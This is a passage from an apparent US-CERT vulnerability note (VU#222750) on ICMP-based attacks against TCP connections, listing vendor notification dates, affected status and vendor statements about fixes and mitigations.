WatchGuard plans to address the issues raised by Gont's paper for all products in software releases currently scheduled for the Q2-Q3 2005 time frame. If you have further questions about this or any other security concern with WatchGuard products, please contact:\n\nSteve Fallin \nDirector, Rapid Response Team \nWatchGuard Technologies \n<http://www.watchguard.com> \nsteve.fallin@watchguard.com \n+1.206.521.8340\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Wind River Systems, Inc. __ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nIn all releases after VxWorks 5.3 a hard error does not result in TCP aborting the connection. The hard error code is saved by TCP. If the connection is dropped due to a timeout this error code is available to the application. Wind River Network Stack 2.0 already checks the ICMP sequence numbers. The release of VxWorks 6.0 and the MSP updates shipping in the fall of 2004 are based on this stack.\n\nWind River is planning updates to the VxWorks 5.5 and 5.4 versions of the stack that will include the fix for ICMP. 
These updates are planned for 2005.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Check Point __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCheck Point products are not vulnerable to this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Clavister __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nClavister Firewall is itself not vulnerable to this class of attacks. It also attempts to protect clients against such attacks.\n\nSpecifically: \n\n\n * No ICMP errors are passed by default. They may however be allowed on a per-rule/service basis.\n * The firewall's own TCP stack (used by internal processes and ALGs) does not listen to ICMP errors at all.\n * All sequence numbers are scrambled using a high quality random engine, making sequence number guessing harder.\n * In the case of many-to-one (dynamic) NAT, source port numbers are allocated randomly, making source port number guessing harder. See draft-gont-tcpm-icmp-attacks-00 section 5.3\n * On not accepting ICMP errors: The method outlined in draft-gont-tcpm-icmp-attacks-00 section 5.2 (delaying the connection reset) results in behavior not too dissimilar. 
The difference simply lies in how many packets get sent before the connection fails.\n * PMTU discovery problems that normally arise by not accepting ICMP errors by default are avoided by doing DF bit stripping by default. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Cyber Guard __ Not Affected\n\nUpdated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Enterasys Networks __ Not Affected\n\nUpdated: June 15, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.enterasys.com/support/security/advisories/222750.pdf>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Fedora Project __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCAN-2004-0790: A blind TCP connection reset by sending\n\nThe Linux 2.4 and 2.6 kernels have always verified the TCP sequence number on ICMP errors. 
In addition Linux kernels will never abort a connection due to a received ICMP packet. All Fedora Core versions are therefore unaffected by this issue. \n \nCAN-2004-0791: A spoofing attack with ICMP type 4 header \n \nThe Linux kernel since 2.6.9 and 2.4.28 has included a patch by Dave Miller to ignore ICMP Source Quench messages as recommended by Fernando Gont. Fedora Core 3 shipped with a 2.6.9 kernel which ignores ICMP Source Quench messages. Fedora Core 2 was updated to a 2.6.9 kernel in a November 2004 update and is therefore also unaffected by this issue. \n \nCAN-2004-1060: ICMP path MTU spoofing \n \nLinux 2.4 and 2.6 kernels verify the sequence number on ICMP errors, thus significantly mitigating this issue. This issue can also be mitigated by disabling pmtu discovery if not required (/proc/sys/net/ipv4/ip_no_pmtu_disc)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Fortinet __ Not Affected\n\nNotified: August 12, 2004 Updated: April 21, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFortinet does not have this problem.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Foundry Networks Inc. 
__ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFoundry's implementation of ICMP on its products is not vulnerable to this type of attack.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Fujitsu __ Not Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>, <http://software.fujitsu.com/jp/security/niscc/niscc.html#222750-tcpicmp>, and <http://jvn.jp/niscc/532967/index.html> (Japanese).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Intoto __ Not Affected\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe analyzed the potential threats discussed in the IETF draft draft-gont-tcpm-icmp-attacks-00.txt and observed that Intoto products are not vulnerable to the described denial of service (DoS) attacks. 
\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNEC Corporation products are not susceptible to this vulnerability.\n\n * We continue to check our products.\n * For more detail:\n<http://www.sw.nec.co.jp/psirt/index.html> (Japanese) \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Netscreen __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks M-series and T-series routers running certain releases of JUNOS software are susceptible to this vulnerability. Other Juniper Networks products are not susceptible to this vulnerability. 
Customers should visit the Juniper Networks Customer Service Center web-site for further information.\n\n<http://www.juniper.net/customers/csc>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Secure Computing Corporation __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nSecure Computing has carefully analyzed the scenarios outlined in the Internet Draft, and has determined that the Sidewinder G2 responds appropriately in those situations. Some of the scenarios mentioned in this draft illustrate again the desirability of using carefully configured security appliances and using protocols such as IPsec.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### SecureWorks __ Not Affected\n\nUpdated: May 03, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Stonesoft __ Not Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### 
Status\n\nNot Affected\n\n### Vendor Statement\n\nStonesoft StoneGate Firewall and IPS products are not affected by these vulnerabilities.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Tech Matrix __ Not Affected\n\nUpdated: April 29, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://jvn.jp/niscc/532967/index.html> (Japanese).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Yamaha __ Not Affected\n\nUpdated: April 29, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://jvn.jp/niscc/532967/index.html> (Japanese).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### 3Com __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or 
additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### AT&T __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Apple Computer, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>. Apple Mac OS X versions prior to 10.2 may be affected.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Avaya __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Avici Systems Inc. 
__ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Borderware __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Charlotte's Web Networks __ Unknown\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Chiaro Networks __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this 
time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Computer Associates __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Cray Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Data Connection __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Debian Linux __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### 
Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Dlink __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### EMC Corporation __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Engarde __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### FreeBSD, Inc. 
__ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### GTA __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Hyperchip __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### IP Filter __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, 
comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Immunix __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Ingrian Networks, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Intel __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Lachman __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not 
provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Linksys __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Lucent Technologies __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Luminous __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Mandriva, Inc. 
__ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Mandriva, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### MontaVista Software, Inc. __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Multi-Tech Systems Inc. 
__ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Multinet __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### NetBSD __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Network Associates __ Unknown\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have 
feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### NextHop __ Unknown\n\nNotified: August 12, 2004 Updated: April 21, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNextHop Technologies software does not include a TCP/IP stack. Instead, it relies on third party TCP/IP stacks. As a result, NextHop software is not directly affected by this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Nokia __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Novell, Inc. 
__ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Openwall GNU/*/Linux __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Polycom Inc. 
__ Unknown\n\nUpdated: September 08, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en> and the Security Headlines posted at the Polycom [Security Center](<http://www.polycom.com/securitycenter/>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Riverstone Networks __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### SGI __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### SUSE Linux __ Unknown\n\nNotified: August 12, 2004 Updated: February 07, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information 
